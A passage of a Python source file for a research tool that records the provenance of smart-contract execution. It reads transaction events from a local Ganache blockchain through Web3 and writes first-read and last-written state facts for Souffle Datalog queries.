current_read_parameters:\r\n# if sv in first_read_states:\r\n# # do nothing, state is read again\r\n# pass\r\n#\r\n# elif sv in last_write_states:\r\n# # state was read after it was written with another value, do nothing\r\n# pass\r\n#\r\n# else:\r\n# # new state read, record it\r\n# first_read_states.add(sv)\r\n# for sv in current_written_parameters:\r\n# if sv in first_read_states:\r\n# # state was written after it was read, record it\r\n# last_write_states.add(sv)\r\n#\r\n# elif sv in last_write_states:\r\n# # state was rewritten do nothing\r\n# pass\r\n#\r\n# else:\r\n# # new state write, record it\r\n# last_write_states.add(sv)\r\n#\r\n\r\n\r\ndef update_first_read_last_written_states(current_read_parameters, current_written_parameters, first_read_states,\r\n last_write_states):\r\n # intersec = current_read_parameters.intersection(current_written_parameters)\r\n # if len(intersec) > 1:\r\n # raise Exception('we support only one state that is both written and read in the same node at most once')\r\n # elif len(intersec) == 1:\r\n # # for example state1 = state1 + var\r\n # for sv in intersec:\r\n # if sv in first_read_states:\r\n # # do nothing, state is read again\r\n # pass\r\n #\r\n # elif sv in last_write_states:\r\n # # state was read after it was written with another value, do nothing\r\n # pass\r\n #\r\n # else:\r\n # # new state read, record it\r\n # first_read_states.add(sv)\r\n\r\n for sv in current_read_parameters:\r\n if sv in first_read_states:\r\n # do nothing, state is read again\r\n pass\r\n\r\n elif sv in last_write_states:\r\n # state was read after it was written with another value, do nothing\r\n pass\r\n\r\n else:\r\n # new state read, record it\r\n first_read_states.add(sv)\r\n for sv in current_written_parameters:\r\n if sv in first_read_states:\r\n # state was written after it was read, record it\r\n last_write_states.add(sv)\r\n\r\n elif sv in last_write_states:\r\n # state was rewritten do nothing\r\n pass\r\n\r\n else:\r\n # new state write, record it\r\n last_write_states.add(sv)\r\n\r\n\r\n\r\nclass ProvenanceProcessor:\r\n def __init__(self):\r\n\r\n self.data_dir_path = \"/home/slinoy/Downloads/Simple_contract/data/\"\r\n\r\n self.facts_dir_path = \"/home/slinoy/Downloads/Simple_contract/data/facts/\"\r\n self.souffle_query_file_path = '/home/slinoy/Downloads/Simple_contract/souffle/query.dl'\r\n\r\n # self.socialite_dir_path = \"/home/slinoy/Downloads/Simple_contract/socialite/\"\r\n # self.socialite_str_symbol = \"`\"\r\n\r\n file_data = read_full_file(self.souffle_query_file_path)\r\n\r\n self.souffle_query_relations_metadata = get_souffle_query_relations_metadata(file_data)\r\n\r\n self.contract_address_to_contract_info = get_contract_address_to_contract_info(self.data_dir_path)\r\n\r\n self.relations_data = get_all_relations_data(self.souffle_query_relations_metadata, self.facts_dir_path)\r\n\r\n # self.inject_dynamic_dummies()\r\n # return\r\n\r\n self.w3 = Web3(HTTPProvider(\"http://127.0.0.1:7545\"))\r\n\r\n self.contracts = self.get_contracts()\r\n\r\n self.path_counter_contract = self.get_path_counter_contract()\r\n\r\n # the following line was supposed to help in mapping a transaction used to deploy a contract\r\n # to the deployed contract address. Important: multiple instances of the same contract are not\r\n # supported since Truffle and Ganache don't support them!!!\r\n self.txhash_to_deployed_contract_address = self.get_txhash_to_deployed_contract_address()\r\n\r\n self.contract_address_to_contract = get_contract_address_to_contract(self.contracts)\r\n self.w3.eth.defaultAccount = self.w3.eth.accounts[0]\r\n\r\n self.static_path_first_read_last_written_state_parameter_memory = self.get_static_path_first_read_last_written_state_parameter_memory()\r\n self.static_contract_state_parameter_memory = self.get_static_contract_state_parameter_memory()\r\n\r\n self.dynamic_contract_memory = self.get_dynamic_contract_memory()\r\n self.dynamic_sc_call_memory = self.get_dynamic_sc_call_memory()\r\n self.dynamic_sc_call_state_parameter_written_memory = self.get_dynamic_sc_call_state_parameter_written_memory()\r\n\r\n def get_txhash_to_deployed_contract_address(self):\r\n txhash_to_deployed_contract_address = {}\r\n for item in self.contract_address_to_contract_info.items():\r\n contract_name = item[1]['contract_name']\r\n if contract_name == 'PathCounter':\r\n continue\r\n\r\n contract_address = item[0]\r\n txhash = None\r\n\r\n for i in item[1]['networks'].items():\r\n txhash = i[1][\"transactionHash\"]\r\n break\r\n assert txhash is not None\r\n\r\n txhash_to_deployed_contract_address[txhash] = contract_address\r\n return txhash_to_deployed_contract_address\r\n\r\n def get_path_counter_contract(self):\r\n path_counter_contract = None\r\n for item in self.contract_address_to_contract_info.items():\r\n contract_name = item[1]['contract_name']\r\n if contract_name == 'PathCounter':\r\n contract_address = item[0]\r\n path_counter_contract = self.get_contract(contract_address)\r\n break\r\n assert path_counter_contract is not None\r\n return path_counter_contract\r\n\r\n def get_contracts(self):\r\n contracts = {}\r\n for item in self.contract_address_to_contract_info.items():\r\n contract_name = item[1]['contract_name']\r\n if contract_name == 'PathCounter':\r\n continue\r\n\r\n contract_address = item[0]\r\n contracts[contract_address] = self.get_contract(contract_address)\r\n\r\n return contracts\r\n\r\n def run(self):\r\n\r\n # static_contract_state_parameter_grouped_by_contract_id = {}\r\n # for static_contract_state_parameter in self.static_contract_state_parameter_memory.values():\r\n # contract_id = static_contract_state_parameter['static_contract_id']\r\n # if contract_id not in static_contract_state_parameter_grouped_by_contract_id:\r\n # static_contract_state_parameter_grouped_by_contract_id[contract_id] = list()\r\n # static_contract_state_parameter_grouped_by_contract_id[contract_id].append(static_contract_state_parameter)\r\n\r\n # for c_item in self.contracts.items():\r\n # contract_id = c_item[0]\r\n # contract_address = c_item[1].address\r\n #\r\n # contract_found = False\r\n # for dynamic_contract_id in self.dynamic_contract_memory:\r\n # if dynamic_contract_id == contract_id:\r\n # contract_found = True\r\n #\r\n # if not contract_found:\r\n # # all deployed contracts need to be written to the dynamic_contract relation\r\n # self.process_dynamic_contract(contract_id, contract_address)\r\n\r\n # Important: multiple instances of the same contract are not supported since Truffle\r\n # and Ganache don't support them!!!\r\n # Because of this, in these environments, there is no way to connect the transaction that\r\n # deploys a contract to its deployed contract address. So no contract creation info is collected\r\n #self.process_init_contract_state_parameters_values(contract_id, static_contract_state_parameter_grouped_by_contract_id)\r\n\r\n self.process()\r\n\r\n # tx_hash = client_contract.functions.withdraw(100).transact()\r\n # w3.eth.waitForTransactionReceipt(tx_hash)\r\n\r\n # todo - the premise is that this process function should be ran after each single transaction has finished\r\n # processing in the miner side. this is due to us enquiring the state values of the relevant contract from the\r\n # contract itself after its execution. reading these sate values after a different transaction had ran can result\r\n # in overriding the previous state values\r\n def process(self):\r\n\r\n dynamic_sc_call_grouped_by_block_trans = get_dynamic_sc_call_grouped_by_block_trans(self.dynamic_sc_call_memory)\r\n grouped_events_data = self.get_current_grouped_events_data(dynamic_sc_call_grouped_by_block_trans, self.path_counter_contract)\r\n\r\n block_numbers = grouped_events_data.keys()\r\n block_numbers = [v for v in block_numbers]\r\n block_numbers.sort(key=lambda t: int(t), reverse=False)\r\n for block_id in block_numbers:\r\n transaction_ids = grouped_events_data[block_id].keys()\r\n transaction_ids = [v for v in transaction_ids]\r\n transaction_ids.sort(key=lambda t: int(t), reverse=False)\r\n for transaction_id in transaction_ids:\r\n dynamic_sc_call_id = uuid.uuid4()\r\n transaction = grouped_events_data[block_id][transaction_id]\r\n\r\n transaction_to = transaction['transaction'].to\r\n transaction_from = transaction['transaction']['from']\r\n contract_address = None\r\n\r\n # Important: multiple instances of the same contract are not supported since Truffle\r\n # and Ganache don't support them!!!\r\n # Because of this, in these environments, there is no way to connect the transaction that\r\n # deploys a contract to its deployed contract address. So no contract creation info is collected\r\n if transaction_to is None:\r\n # created contract address is in the from field\r\n contract_address = transaction_from\r\n else:\r\n contract_address = transaction_to\r\n\r\n if contract_address not in self.contract_address_to_contract_info:\r\n continue\r\n\r\n f_name = f'get_batch_id'\r\n contract = self.contracts[contract_address]\r\n m = getattr(contract.functions, f_name)\r\n batch_id = m().call()\r\n\r\n if contract_address not in self.dynamic_contract_memory:\r\n contract_name = self.contract_address_to_contract_info[contract_address]['contract_name']\r\n # all deployed contracts need to be written to the dynamic_contract relation\r\n self.process_dynamic_contract(batch_id, contract_name, contract_address)\r\n assert contract_address in self.dynamic_contract_memory\r\n\r\n self.process_dynamic_sc_call(dynamic_sc_call_id, block_id, transaction_id, transaction)\r\n self.process_dynamic_path(dynamic_sc_call_id, transaction)\r\n self.process_dynamic_sc_function_call_parameter(dynamic_sc_call_id, transaction)\r\n\r\n first_read_states, last_write_states = self.get_transaction_first_read_last_write_state_ids(batch_id, transaction)\r\n\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id = \\\r\n self.get_dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id()\r\n\r\n rel_name = 'dynamic_smart_contract_call_state_parameter_read'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n for static_contract_state_parameter_id in first_read_states:\r\n #static_contract_state_parameter_id = read_parameter['static_contract_state_parameter_id']\r\n last_written = get_last_dynamic_sc_state_param_written(\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id,\r\n batch_id,\r\n static_contract_state_parameter_id)\r\n\r\n d = {\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_contract_state_parameter_id': static_contract_state_parameter_id,\r\n 'dynamic_smart_contract_call_state_parameter_written': last_written,\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n\r\n rel_name = 'dynamic_smart_contract_call_state_parameter_written'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n for static_contract_state_parameter_id in last_write_states:\r\n dynamic_smart_contract_call_state_parameter_written_id = uuid.uuid4()\r\n #static_contract_state_parameter_id = written_parameter['static_contract_state_parameter_id']\r\n last_written = get_last_dynamic_sc_state_param_written(\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id,\r\n batch_id,\r\n static_contract_state_parameter_id)\r\n\r\n batch_id_str = str(batch_id)\r\n key = (batch_id_str, static_contract_state_parameter_id)\r\n static_contract_state_parameter = self.static_contract_state_parameter_memory[key]\r\n\r\n parameter_name = static_contract_state_parameter['name']\r\n f_name = f'get_state_{parameter_name}'\r\n\r\n #contract_id = static_contract_state_parameter['static_contract_id']\r\n #contract = self.contracts[contract_id]\r\n contract = self.contracts[contract_address]\r\n\r\n m = getattr(contract.functions, f_name)\r\n new_written = m().call()\r\n\r\n d = {\r\n 'dynamic_smart_contract_call_state_parameter_written_id': str(dynamic_smart_contract_call_state_parameter_written_id),\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_contract_state_parameter_id': static_contract_state_parameter_id,\r\n 'value': str(new_written),\r\n 'prev_dynamic_smart_contract_call_state_parameter_written': last_written,\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n self.dynamic_sc_call_state_parameter_written_memory = self.get_dynamic_sc_call_state_parameter_written_memory()\r\n\r\n def inject_dynamic_dummies(self):\r\n sc_call = self.relations_data['dynamic_smart_contract_call']\r\n # get last contract call\r\n last_sc_call = sc_call[len(sc_call) - 1]\r\n prev_sc_call_id = last_sc_call['smart_contract_call_id']\r\n\r\n path = self.relations_data['dynamic_path']\r\n prev_sc_call_paths = [p for p in path if\r\n p['dynamic_smart_contract_call_id'] == prev_sc_call_id]\r\n\r\n sc_state_param_written = self.relations_data['dynamic_smart_contract_call_state_parameter_written']\r\n prev_sc_state_param_written = [p for p in sc_state_param_written if\r\n p['dynamic_smart_contract_call_id'] == prev_sc_call_id]\r\n suffix = \"_20M.facts\"\r\n for i in range(0, 20000000):\r\n\r\n current_sc_call_id = str(uuid.uuid4())\r\n # d = {\r\n # 'smart_contract_call_id': current_sc_call_id,\r\n # 'dynamic_contract_id': last_sc_call['dynamic_contract_id'],\r\n # 'block_id': last_sc_call['block_id'],\r\n # 'transaction_id': last_sc_call['transaction_id'],\r\n # 'caller_address': last_sc_call['caller_address'],\r\n # 'ether_start': 'not_yet_supported',\r\n # 'ether_end': 'not_yet_supported',\r\n # 'static_function_id': last_sc_call['static_function_id'],\r\n # }\r\n # rel_name = 'dynamic_smart_contract_call'\r\n # facts_file_path = self.facts_dir_path + rel_name + suffix\r\n # append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n #\r\n # continue\r\n #\r\n # current_sc_call_paths = list()\r\n # for p in prev_sc_call_paths:\r\n # d = {\r\n # 'dynamic_smart_contract_call_id': current_sc_call_id,\r\n # 'static_path_id': p['static_path_id'],\r\n # 'order': p['order'],\r\n # 'path_count': p['path_count'],\r\n # }\r\n # rel_name = 'dynamic_path'\r\n # facts_file_path = self.facts_dir_path + rel_name + suffix\r\n # append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n # current_sc_call_paths.append(d)\r\n # prev_sc_call_paths = current_sc_call_paths\r\n\r\n current_sc_state_param_written = list()\r\n for p in prev_sc_state_param_written:\r\n\r\n d = {\r\n 'dynamic_smart_contract_call_state_parameter_written_id': str(uuid.uuid4()),\r\n 'dynamic_smart_contract_call_id': current_sc_call_id,\r\n 'static_contract_state_parameter_id': p['static_contract_state_parameter_id'],\r\n 'value': p['value'],\r\n 'prev_dynamic_smart_contract_call_state_parameter_written': p['dynamic_smart_contract_call_state_parameter_written_id'],\r\n }\r\n rel_name = 'dynamic_smart_contract_call_state_parameter_written'\r\n facts_file_path = self.facts_dir_path + rel_name + suffix\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n current_sc_state_param_written.append(d)\r\n prev_sc_state_param_written = current_sc_state_param_written\r\n\r\n\r\n def get_transaction_first_read_last_write_state_ids(self, batch_id, transaction):\r\n # hash_ = str(get_logs_hash(transaction))\r\n\r\n logs = transaction['logs']\r\n logs = [v for v in logs]\r\n logs.sort(key=lambda t: int(t[0]), reverse=False)\r\n # path_ids_list = list()\r\n first_read_states = set()\r\n last_write_states = set()\r\n for log in logs:\r\n log_pos = log[0]\r\n log_args = log[1]\r\n path_id = log_args['path_id']\r\n\r\n path_id_str = str(path_id)\r\n batch_id_str = str(batch_id)\r\n key = (batch_id_str, path_id_str)\r\n if key not in self.static_path_first_read_last_written_state_parameter_memory:\r\n continue\r\n\r\n current_read_parameters = [p['static_contract_state_parameter_id'] for p in\r\n self.static_path_first_read_last_written_state_parameter_memory[key]\r\n if p['first_read_or_last_written'] == 'first_read']\r\n current_read_parameters = set(current_read_parameters)\r\n\r\n current_written_parameters = [p['static_contract_state_parameter_id'] for p in\r\n self.static_path_first_read_last_written_state_parameter_memory[key]\r\n if p['first_read_or_last_written'] == 'last_written']\r\n current_written_parameters = set(current_written_parameters)\r\n\r\n update_first_read_last_written_states(current_read_parameters, current_written_parameters,\r\n first_read_states,\r\n last_write_states)\r\n\r\n # read_parameters = [p for p in self.static_path_first_read_last_written_state_parameter_memory[hash_]\r\n # if p['first_read_or_last_written'] == 'first_read']\r\n # written_parameters = [p for p in self.static_path_first_read_last_written_state_parameter_memory[hash_]\r\n # if p['first_read_or_last_written'] == 'last_written']\r\n # important! do this before the written parameters so in the case a written value was also read, we don't\r\n # point to it but point to the past transaction written value\r\n\r\n return first_read_states, last_write_states\r\n\r\n def get_dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id(self):\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id = {}\r\n for dynamic_sc_call_state_parameter_written_item in self.dynamic_sc_call_state_parameter_written_memory.items():\r\n contract_state_parameter_id = dynamic_sc_call_state_parameter_written_item[0]\r\n dynamic_sc_call_state_parameter_written = dynamic_sc_call_state_parameter_written_item[1]\r\n\r\n dynamic_smart_contract_call_id = dynamic_sc_call_state_parameter_written['dynamic_smart_contract_call_id']\r\n assert dynamic_smart_contract_call_id in self.dynamic_sc_call_memory\r\n\r\n dynamic_sc_call = self.dynamic_sc_call_memory[dynamic_smart_contract_call_id]\r\n static_contract_state_parameter_id = dynamic_sc_call_state_parameter_written['static_contract_state_parameter_id']\r\n\r\n contract_id = dynamic_sc_call['dynamic_contract_id']\r\n assert contract_id in self.dynamic_contract_memory\r\n\r\n batch_id = self.dynamic_contract_memory[contract_id]['batch_id']\r\n key = (batch_id, static_contract_state_parameter_id)\r\n\r\n if key not in dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id:\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key] = list()\r\n\r\n l_i = (dynamic_sc_call['block_id'], dynamic_sc_call['transaction_id'], dynamic_sc_call_state_parameter_written)\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key].append(l_i)\r\n\r\n for key in dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id:\r\n l = dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key]\r\n l.sort(key=lambda t: (int(t[0]), int(t[1])), reverse=False)\r\n new_l = [i[2] for i in l]\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key] = new_l\r\n return dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id\r\n\r\n def get_dynamic_sc_call_state_parameter_written_memory(self):\r\n dynamic_sc_call_state_parameter_written = self.relations_data['dynamic_smart_contract_call_state_parameter_written']\r\n dynamic_sc_call_state_parameter_written_memory = {}\r\n for dynamic_sc_call_state_parameter_written_item in dynamic_sc_call_state_parameter_written:\r\n dynamic_smart_contract_call_state_parameter_written_id = dynamic_sc_call_state_parameter_written_item['dynamic_smart_contract_call_state_parameter_written_id']\r\n dynamic_sc_call_state_parameter_written_memory[dynamic_smart_contract_call_state_parameter_written_id] = dynamic_sc_call_state_parameter_written_item\r\n\r\n return dynamic_sc_call_state_parameter_written_memory\r\n\r\n def get_dynamic_contract_memory(self):\r\n dynamic_contract = self.relations_data['dynamic_contract']\r\n dynamic_contract_memory = {}\r\n for dynamic_contract_item in dynamic_contract:\r\n contract_address = dynamic_contract_item['contract_address']\r\n dynamic_contract_memory[contract_address] = dynamic_contract_item\r\n return dynamic_contract_memory\r\n\r\n def get_static_path_first_read_last_written_state_parameter_memory(self):\r\n static_path_first_read_last_written_state_parameter = self.relations_data['static_path_first_read_last_written_state_parameter']\r\n static_path_first_read_last_written_state_parameter_memory = {}\r\n for static_path_first_read_last_written_state_parameter_item in static_path_first_read_last_written_state_parameter:\r\n batch_id = static_path_first_read_last_written_state_parameter_item['batch_id']\r\n static_contract_id = static_path_first_read_last_written_state_parameter_item['static_path_id']\r\n key = (batch_id, static_contract_id)\r\n\r\n if key not in static_path_first_read_last_written_state_parameter_memory:\r\n static_path_first_read_last_written_state_parameter_memory[key] = list()\r\n\r\n static_path_first_read_last_written_state_parameter_memory[key].append(static_path_first_read_last_written_state_parameter_item)\r\n return static_path_first_read_last_written_state_parameter_memory\r\n\r\n def get_static_contract_state_parameter_memory(self):\r\n static_contract_state_parameter = self.relations_data['static_contract_state_parameter']\r\n static_contract_state_parameter_memory = {}\r\n for static_contract_state_parameter_item in static_contract_state_parameter:\r\n batch_id = static_contract_state_parameter_item['batch_id']\r\n contract_state_parameter_id = static_contract_state_parameter_item['contract_state_parameter_id']\r\n key = (batch_id, contract_state_parameter_id)\r\n static_contract_state_parameter_memory[key] = static_contract_state_parameter_item\r\n\r\n return static_contract_state_parameter_memory\r\n\r\n def process_init_contract_state_parameters_values(self, contract_id, static_contract_state_parameter_grouped_by_contract_id):\r\n dynamic_sc_call_id = uuid.uuid4()\r\n # create a dummy dynamic smart contract call\r\n rel_name = 'dynamic_smart_contract_call'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n d = {\r\n 'smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'dynamic_contract_id': contract_id,\r\n 'block_id': str(-1),\r\n 'transaction_id': str(-1),\r\n 'caller_address': 'NULL',\r\n 'ether_start': 'NULL',\r\n 'ether_end': 'NULL',\r\n 'static_function_id': 'NULL',\r\n #'static_full_path_id': 'NULL',\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n self.dynamic_sc_call_memory = self.get_dynamic_sc_call_memory()\r\n\r\n rel_name = 'dynamic_smart_contract_call_state_parameter_written'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n contract_name = self.contract_address_to_contract_info[contract_id]['contract_name']\r\n for state_parameter_item in static_contract_state_parameter_grouped_by_contract_id[contract_name]:\r\n d = {\r\n 'dynamic_smart_contract_call_state_parameter_written_id': str(uuid.uuid4()),\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_contract_state_parameter_id': state_parameter_item['contract_state_parameter_id'],\r\n 'value': state_parameter_item['initial_value'],\r\n 'prev_dynamic_smart_contract_call_state_parameter_written': 'NULL'\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n self.dynamic_sc_call_state_parameter_written_memory = self.get_dynamic_sc_call_state_parameter_written_memory()\r\n\r\n def process_dynamic_contract(self, batch_id, contract_name, contract_address):\r\n rel_name = 'dynamic_contract'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n # contract_name = self.contract_address_to_contract_info[contract_address]['contract_name']\r\n d = {\r\n 'batch_id': str(batch_id),\r\n 'contract_id': contract_name,\r\n 'deployer_address': 'not_yet_supported',\r\n 'initial_ether': 'NULL',\r\n 'contract_address': contract_address,\r\n 'contract_name': contract_name,\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n\r\n self.dynamic_contract_memory = self.get_dynamic_contract_memory()\r\n\r\n def get_current_grouped_events_data(self, grouped_dynamic_sc_call, path_counter_contract):\r\n block_ids = grouped_dynamic_sc_call.keys()\r\n block_ids = [int(v) for v in block_ids]\r\n current_max_block_id = get_max_value(block_ids)\r\n current_max_transaction_id = None\r\n if current_max_block_id is not None:\r\n transaction_ids = grouped_dynamic_sc_call[current_max_block_id].keys()\r\n transaction_ids = [int(v) for v in transaction_ids]\r\n current_max_transaction_id = get_max_value(transaction_ids)\r\n\r\n # todo - there is a bug that will freezes ganache if from_block is different than 0\r\n # current_max_block_id = 0 if current_max_block_id is None else current_max_block_id\r\n events_data = get_events_data(path_counter_contract, 0, \"latest\")\r\n grouped_events_data = {}\r\n for e in events_data:\r\n block_number = int(e['blockNumber'])\r\n transaction_index = int(e['transactionIndex'])\r\n\r\n if current_max_block_id is not None and block_number and block_number < current_max_block_id:\r\n continue\r\n\r\n if current_max_block_id is not None and block_number == current_max_block_id and transaction_index <= current_max_transaction_id:\r\n continue\r\n\r\n block_data = None\r\n if block_number not in grouped_events_data:\r\n block_data = {}\r\n grouped_events_data[block_number] = block_data\r\n else:\r\n block_data = grouped_events_data[block_number]\r\n\r\n transaction_data = None\r\n if transaction_index not in block_data:\r\n\r\n transaction = self.w3.eth.getTransaction(e['transactionHash'])\r\n\r\n transaction_data = {\r\n 'transaction': transaction,\r\n 'logs': list()\r\n }\r\n block_data[transaction_index] = transaction_data\r\n else:\r\n transaction_data = block_data[transaction_index]\r\n\r\n log_index = e['logIndex']\r\n args = {\r\n 'path_id': e[\"args\"]['path_id'],\r\n 'count': e[\"args\"]['count']\r\n }\r\n transaction_data['logs'].append((log_index, args))\r\n return grouped_events_data\r\n\r\n def process_dynamic_sc_function_call_parameter(self, dynamic_sc_call_id, transaction):\r\n # todo - handle transaction, which involves a smart contract deployment with constructor parameters\r\n\r\n rel_name = 'dynamic_smart_contract_function_call_parameter'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n transaction_to = transaction['transaction'].to\r\n transaction_input = transaction['transaction'].input\r\n if transaction_to in self.contract_address_to_contract:\r\n contract_item = self.contract_address_to_contract[transaction_to]\r\n contract = contract_item['contract']\r\n contract_name = contract_item['contract_id']\r\n\r\n function_name, parameters = get_function_name_and_parameters(contract, transaction_input)\r\n\r\n function_parameters = list()\r\n for p in parameters:\r\n function_parameters.append(p['type'])\r\n\r\n for p in parameters:\r\n parameter_name = p['name']\r\n parameter_value = p['val']\r\n\r\n c_name = self.contract_address_to_contract_info[contract_name]['contract_name']\r\n static_function_parameter_id = get_contract_full_function_parameter_id(c_name, function_name,\r\n function_parameters,\r\n parameter_name)\r\n\r\n d = {\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_function_parameter_id': static_function_parameter_id,\r\n 'value': str(parameter_value)\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n\r\n def process_dynamic_path(self, dynamic_sc_call_id, transaction):\r\n rel_name = 'dynamic_path'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n logs = transaction['logs']\r\n logs = [v for v in logs]\r\n logs.sort(key=lambda t: int(t[0]), reverse=False)\r\n path_ids_list = list()\r\n for log in logs:\r\n log_pos = log[0]\r\n log_args = log[1]\r\n\r\n path_id = log_args['path_id']\r\n path_count = log_args['count']\r\n\r\n path_ids_list.append(path_id)\r\n\r\n # todo sort by log_pos before writing to file\r\n d = {\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_path_id': str(path_id),\r\n 'order': str(log_pos),\r\n 'path_count': str(path_count),\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n\r\n def process_dynamic_sc_call(self, dynamic_sc_call_id, block_id, transaction_id, transaction):\r\n rel_name = 'dynamic_smart_contract_call'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n #hash_ = get_logs_hash(transaction)\r\n transaction_to = transaction['transaction'].to\r\n transaction_from = transaction['transaction']['from']\r\n transaction_input = transaction['transaction'].input\r\n\r\n # static_function_id = None\r\n\r\n # todo - constructor call on deployed contract without a to address is not supported yet\r\n contract_item = self.contract_address_to_contract[transaction_to]\r\n contract = contract_item['contract']\r\n contract_name = contract_item['contract_id']\r\n function_name, parameters = get_function_name_and_parameters(contract, transaction_input)\r\n\r\n function_parameters = list()\r\n for p in parameters:\r\n function_parameters.append(p['type'])\r\n\r\n c_name = self.contract_address_to_contract_info[contract_name]['contract_name']\r\n static_function_id = full_function_signature(c_name, function_name, function_parameters)\r\n\r\n d = {\r\n 'smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'dynamic_contract_id': transaction_to if transaction_to is not None else 'NULL',\r\n 'block_id': str(block_id),\r\n 'transaction_id': str(transaction_id),\r\n 'caller_address': transaction_from,\r\n 'ether_start': 'not_yet_supported',\r\n\r\n # 'ether_end': 'not_yet_supported',\r\n 'ether_end': str(self.w3.eth.getBalance(transaction_to)) if transaction_to is not None else 'NULL',\r\n\r\n 'static_function_id': static_function_id if static_function_id is not None else 'NULL',\r\n #'static_full_path_id': str(hash_),\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n self.dynamic_sc_call_memory = self.get_dynamic_sc_call_memory()\r\n\r\n def get_dynamic_sc_call_memory(self):\r\n dynamic_sc_call = self.relations_data['dynamic_smart_contract_call']\r\n dynamic_sc_call_memory = {}\r\n for dynamic_sc_call_item in dynamic_sc_call:\r\n smart_contract_call_id = dynamic_sc_call_item['smart_contract_call_id']\r\n dynamic_sc_call_memory[smart_contract_call_id] = dynamic_sc_call_item\r\n\r\n return dynamic_sc_call_memory\r\n\r\n # def process_dynamic_contract_(self):\r\n # # dynamic_contract\r\n # rel_name = 'dynamic_contract'\r\n # facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n # dynamic_contract_data = self.relations_data[rel_name]\r\n # for c_item in self.contracts.items():\r\n # contract_id = c_item[0]\r\n # contract_address = c_item[1].address\r\n #\r\n # contract_found = False\r\n # for d in dynamic_contract_data:\r\n # if d['contract_id'] == contract_id:\r\n # contract_found = True\r\n #\r\n # if not contract_found:\r\n # d = {\r\n # 'contract_id': contract_id,\r\n # 'deployer_address': 'not_yet_supported',\r\n # 'ether': 'not_yet_supported',\r\n # 'contract_address': contract_address,\r\n # }\r\n # append_query_line_from_dic(d, rel_name, self.souffle_query_relations, facts_file_path)\r\n #\r\n # load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations, self.relations_data)\r\n\r\n def get_contract(self, contract_address):\r\n #contract_address = self.contract_address_to_contract_info[contract_name]['contract_address']\r\n address = self.w3.toChecksumAddress(contract_address)\r\n abi = self.contract_address_to_contract_info[contract_address]['contract_abi']\r\n myContract = self.w3.eth.contract(address=address, abi=abi)\r\n\r\n return myContract\r\n\r\n\r\npp = ProvenanceProcessor()\r\npp.run()\r\n\r\n\r\n\r\n\r\n\r\n\r\n# def process_events(myContract, contract_name, full_event_name_to_event_details):\r\n# for contractEvent in myContract.events:\r\n# myfilter = contractEvent.createFilter(fromBlock=0, toBlock=\"latest\")\r\n# eventlist = myfilter.get_all_entries()\r\n#\r\n# for event in eventlist:\r\n# # t = w3.eth.getTransactionByBlock(event[\"blockNumber\"], event[\"transactionIndex\"])\r\n#\r\n# event_name = event[\"event\"]\r\n# # print(event_name+\"--------------------------------------------\"+contract_name)\r\n# # if event_name.startswith(\"_provenance_call_\"):\r\n# if 